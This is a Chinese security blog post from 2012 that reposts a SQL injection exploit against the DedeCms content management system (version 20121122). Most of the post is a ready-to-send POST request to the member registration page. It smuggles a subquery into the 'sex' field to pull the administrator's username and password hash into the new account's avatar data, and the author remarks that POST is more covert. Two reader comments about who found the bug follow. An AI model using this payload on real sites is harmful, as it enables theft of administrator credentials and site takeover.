您的位置 » 首页 » 实用工具 » 最新漏洞:老树新花DedeCms SQL注射漏洞再利用

最新漏洞:老树新花DedeCms SQL注射漏洞再利用

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年12月04日 | 文章热度:5,392 次 全屏阅读

显示不全请点击全屏阅读

dedecms版本 20121122

需要magic_quotes_gpc=Off

应该是没有什么大危害的漏洞.
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.

是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
POST提交以下数据,其实不用POST提交的,这样隐蔽点.

http:///de/member/reg_new.php

POST

dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy’,100,100,’sss@xx.xx’,1000,0,’www’ and @`’`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,”,1316751900,”,1316751900,”);%00&vdcode=glos&agree=

成功注册后,头像处里面有好玩的信息.

Tags:

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1822/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • c4rp3nt3r 说:
    1楼
    2012 年 12 月 18 日 下午 2:00 回复

    这鸡肋是你发现的?

    • 【管理员】seay 说:
      2012 年 12 月 18 日 下午 9:34 回复

      不是,是在别的门户站看到的,首页置顶文章有说明,门户站转载文章如果没有带作者,本人不会到处去找作者,博客转载的文章一定会带上原文地址

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)